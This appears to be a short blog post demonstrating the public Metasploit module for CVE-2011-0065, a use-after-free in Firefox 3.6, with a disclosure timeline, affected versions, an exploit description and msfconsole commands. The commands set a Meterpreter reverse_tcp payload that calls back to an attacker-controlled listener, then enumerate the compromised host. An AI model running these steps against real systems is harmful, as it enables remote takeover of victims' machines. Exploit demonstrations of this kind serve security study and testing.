aka wow on ZATAZ.com
CVE-2011-0065 : Mozilla Firefox mChannel use after free vulnerability Metasploit Demo
Timeline :
Vulnerability discovered by regenrecht and submitted to ZDI
Initial ZDI vulnerability notification to vendor the 2011-02-17
Coordinated public release of the vulnerability the 2011-04-28
Metasploit PoC provided the 2011-08-10
PoC provided by :
regenrecht
Rh0
Reference(s) :
CVE-2011-0065
OSVDB-72085
ZDI-11-158
MFSA-2011-13
Affected version(s) :
Firefox 3.6.17 and bellow
Firefox 3.5.19 and bellow
Seamonkey 2.0.14 and bellow
Tested on Windows XP SP3 with :
Mozilla Firefox 3.6.16
Description :
This module exploits an use after free vulnerability in Mozilla Firefox 3.6.16. An OBJECT Element mChannel can be freed via the OnChannelRedirect method of the nsIChannelEventSink Interface. mChannel becomes a dangling pointer and can be reused when setting the OBJECTs data attribute. (Discovered by regenrecht). This module uses heapspray with a minimal ROP chain to bypass DEP on Windows XP SP3.
Commands :
use exploit/windows/browser/mozilla_mchannel
set SRVHOST 192.168.178.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploitsessions -i 1
getuid
sysinfo
ipconfig
I recommend you to read these related posts
- CVE-2011-0073 : Mozilla Firefox nsTreeRange Dangling Pointer Vulnerability
- CVE-2011-3658 Firefox 7/8 nsSVGValue Vulnerability Metasploit Demo
- CVE-2010-3765 : Mozilla Firefox Interleaving document.write and appendChild Exploit
- CVE-2011-2371 Mozilla Firefox Array.reduceRight() Integer Overflow Metasploit Demo
- CVE-2006-3677 : Mozilla Suite/Firefox Navigator Object Code Execution
- CVE-2005-2265 : Mozilla Suite/Firefox InstallVersion compareTo() Code Execution
- Mozilla Firefox Bootstrapped Add-on Social Engineering Code Execution Metasploit Demo
- CVE-2011-3659 Firefox 8/9 AttributeChildRemoved() Use-After-Free Metasploit Demo
- Fraudulent TURKTRUST Digital Certificat Used In Active Attacks
- CVE-2010-3867 : ProFTPD IAC Remote Root Exploit
